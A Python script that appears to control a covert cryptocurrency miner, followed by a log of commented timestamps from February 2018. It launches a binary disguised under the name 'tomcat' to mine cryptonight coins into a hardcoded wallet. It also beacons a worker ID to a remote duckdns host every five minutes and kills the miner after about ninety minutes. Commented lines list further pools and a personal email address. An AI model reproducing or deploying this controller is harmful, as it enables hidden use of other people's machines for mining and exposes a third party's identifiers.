import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:16:01.525016
#2018-02-17 17:03:07.356669
#2018-02-17 18:50:08.058535
#2018-02-17 20:38:05.825015
#2018-02-17 22:23:05.793036
#2018-02-18 00:07:03.764512
#2018-02-18 01:57:05.133171
#2018-02-18 03:45:06.742776
#2018-02-18 05:31:05.063764
#2018-02-18 07:23:07.253399
#2018-02-18 09:11:01.893885
#2018-02-18 10:56:07.064808
#2018-02-18 12:42:07.549392
#2018-02-18 14:29:05.194447
#2018-02-18 16:19:04.172520
#2018-02-18 18:08:01.635186
#2018-02-18 19:53:07.382976
#2018-02-18 21:41:06.111634
#2018-02-18 23:29:04.593542
#2018-02-19 01:16:06.315131
#2018-02-19 03:02:07.717214
#2018-02-19 04:48:07.418616
#2018-02-19 06:34:06.465266
#2018-02-19 08:23:04.559511
#2018-02-19 10:12:07.163155
#2018-02-19 12:01:09.250227
#2018-02-19 13:47:09.215219
#2018-02-19 15:37:05.963386
#2018-02-19 17:23:06.713682
#2018-02-19 19:10:09.334770
#2018-02-19 20:57:07.658872
#2018-02-19 22:46:05.719540
#2018-02-20 00:31:04.492692
#2018-02-20 02:19:03.639788
#2018-02-20 04:09:05.896256
#2018-02-20 05:52:03.880696
#2018-02-20 07:38:05.684035
#2018-02-20 09:23:04.247450
#2018-02-20 11:07:07.236792
#2018-02-20 12:53:05.783342
#2018-02-20 14:37:01.812669
#2018-02-20 16:21:10.929589
#2018-02-20 18:09:11.172606
#2018-02-20 20:01:05.844387
#2018-02-20 21:48:05.521590
#2018-02-20 23:30:07.029792
#2018-02-21 01:14:01.289184
#2018-02-21 03:01:05.838726
#2018-02-21 04:49:06.495414
#2018-02-21 06:38:04.667134
#2018-02-21 08:24:04.398886
#2018-02-21 10:09:03.989907
#2018-02-21 11:57:06.960628
#2018-02-21 13:48:01.536102
#2018-02-21 15:33:05.416896
#2018-02-21 17:21:10.623727
#2018-02-21 19:10:03.443801
#2018-02-21 20:56:06.614588
#2018-02-21 22:43:01.952757
#2018-02-22 00:32:07.014174
#2018-02-22 02:21:06.870251
#2018-02-22 04:07:05.503351
#2018-02-22 05:52:05.335266
#2018-02-22 07:37:07.640722
#2018-02-22 09:25:09.133537
#2018-02-22 11:11:05.674319
#2018-02-22 12:57:02.011091
#2018-02-22 14:45:08.098101
#2018-02-22 16:29:11.178505
#2018-02-22 18:15:10.825182
#2018-02-22 20:04:07.871591
#2018-02-22 21:53:08.100718
#2018-02-22 23:42:03.782319
#2018-02-23 01:29:05.882005
#2018-02-23 03:16:07.769934
#2018-02-23 05:04:05.023177
#2018-02-23 06:48:03.828609
#2018-02-23 08:38:05.541642
#2018-02-23 10:53:05.409843
#2018-02-23 12:50:07.239659
#2018-02-23 14:35:09.555623
#2018-02-23 16:24:08.589707
#2018-02-23 18:12:04.084684
#2018-02-23 19:56:08.654196
#2018-02-23 21:41:05.551501
#2018-02-23 23:35:04.175563
#2018-02-24 01:24:04.178646
#2018-02-24 03:14:06.821094
#2018-02-24 04:59:03.879546
#2018-02-24 06:46:06.771967
#2018-02-24 08:36:07.303351
#2018-02-24 10:21:06.435250
#2018-02-24 12:17:05.157945
#2018-02-24 14:10:06.793928
#2018-02-24 15:57:04.410700
#2018-02-24 17:49:07.284656
#2018-02-24 19:37:05.892735
#2018-02-24 21:24:06.664160
#2018-02-25 00:05:02.027515
#2018-02-25 04:25:02.886657
#2018-02-25 08:07:05.655667